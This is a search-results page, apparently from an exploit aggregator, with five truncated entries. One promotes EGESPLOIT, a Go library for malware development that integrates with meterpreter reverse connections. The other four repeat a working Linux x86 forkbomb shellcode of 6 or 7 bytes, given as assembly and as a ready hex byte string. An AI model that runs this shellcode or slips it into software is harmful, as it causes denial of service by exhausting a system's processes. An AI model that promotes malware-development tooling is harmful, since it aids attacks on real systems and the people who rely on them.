5 matches found
EGESPLOIT - A Golang Library For Malware Development
EGESPLOIT is a golang library for malware development, it has few unique functions for meterpreter integration. DOCUMENTATION CalculateChecksumx : Function calculates x digit 8 bit checksum for reverse HTTP/HTTPS meterpreter connections, returns the calculated checksum as string...
Linux x86 forkbombe
Linux x86 forkbombe. Shellcode exploit for linux platform / Title: Linux x86 forkbombe - 6 bytes Author: Jonathan Salwan Web: http://www.shell-storm.org ! Database of shellcodes: http://www.shell-storm.org/shellcode/ Disassembly of section .text: 08048054 : 8048054: b0 02 mov $0x2,%al 8048056: cd...
linux/x86 forkbomb 7 bytes
No description provided by source. / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode = "\x6a\x02\x58\xcd\x80\xeb\xf9"; void shellcode;...
linux/x86 forkbomb 7 bytes
Exploit for linux/x86 platform in category shellcode ========================== linux/x86 forkbomb 7 bytes ========================== / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode...
linux/x86 - forkbomb 7 bytes
linux/x86 forkbomb 7 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode = "\x6a\x02\x58\xcd\x80\xeb\xf9"; void shellcode; // milw0rm.com...